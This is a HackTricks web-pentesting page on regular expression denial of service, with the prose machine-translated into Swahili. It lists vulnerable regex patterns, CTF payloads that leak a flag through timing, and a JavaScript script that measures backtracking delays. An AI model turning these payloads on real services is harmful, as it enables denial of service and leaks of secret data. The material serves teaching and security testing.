hacktricks/pentesting-web/regular-expression-denial-of-service-redos.md

6.3 KiB

Regular expression Denial of Service - ReDoS

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Regular Expression Denial of Service (ReDoS)

Denial of Service ya Mifumo ya Kawaida (ReDoS) inatokea wakati mtu anatumia udhaifu katika jinsi mifumo ya kawaida inavyofanya kazi (njia ya kutafuta na kulinganisha mifumo katika maandiko). Wakati mwingine, wakati mifumo ya kawaida inatumika, inaweza kuwa polepole sana, hasa ikiwa kipande cha maandiko wanachofanya kazi nacho kinakuwa kikubwa. Polepole hii inaweza kuwa mbaya kiasi kwamba inakua haraka sana hata kwa ongezeko dogo la ukubwa wa maandiko. Washambuliaji wanaweza kutumia tatizo hili kufanya programu inayotumia mifumo ya kawaida isifanye kazi vizuri kwa muda mrefu.

Algorithm ya Regex ya Kawaida Inayoshughulika

Angalia maelezo katika https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

Regex Mbaya

Mifumo ya kawaida mbaya ni ile ambayo inaweza kushindwa kwenye ingizo lililotengenezwa na kusababisha DoS. Mifumo ya regex mbaya kwa kawaida ina kundi lenye kurudiwa na kurudiwa au mbadala na kuingiliana ndani ya kundi lililorejelewa. Baadhi ya mifano ya mifumo mbaya ni:

  • (a+)+
  • ([a-zA-Z]+)*
  • (a|aa)+
  • (a|a?)+
  • (.*a){x} kwa x > 10

Zote hizo ni hatarini kwa ingizo aaaaaaaaaaaaaaaaaaaaaaaa!.

ReDoS Payloads

Uhamishaji wa Mstari kupitia ReDoS

Katika CTF (au bug bounty) labda unafanya udhibiti wa Regex ambayo taarifa nyeti (bendera) inalinganishwa nayo. Kisha, inaweza kuwa muhimu kufanya ukurasa usimame (timeout au muda mrefu wa usindikaji) ikiwa Regex ililingana na sio ikiwa haikulingana. Kwa njia hii utaweza kuhamasisha mstari karibu na karatasi:

  • Katika hiki chapisho unaweza kupata sheria hii ya ReDoS: ^(?=<flag>)((.*)*)*salt$
  • Mfano: ^(?=HTB{sOmE_fl§N§)((.*)*)*salt$
  • Katika hiki andiko unaweza kupata hii:<flag>(((((((.*)*)*)*)*)*)*)!
  • Katika hiki andiko alitumia: ^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$

Kudhibiti Ingizo na Regex ya ReDoS

Ifuatayo ni mifano ya ReDoS ambapo unafanya udhibiti wa ingizo na regex:

function check_time_regexp(regexp, text){
var t0 = new Date().getTime();;
new RegExp(regexp).test(text);
var t1 = new Date().getTime();;
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}

// This payloads work because the input has several "a"s
[
//  "((a+)+)+$",  //Eternal,
//  "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$",   //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))

/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/

Tools

References

{% hint style="success" %} Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}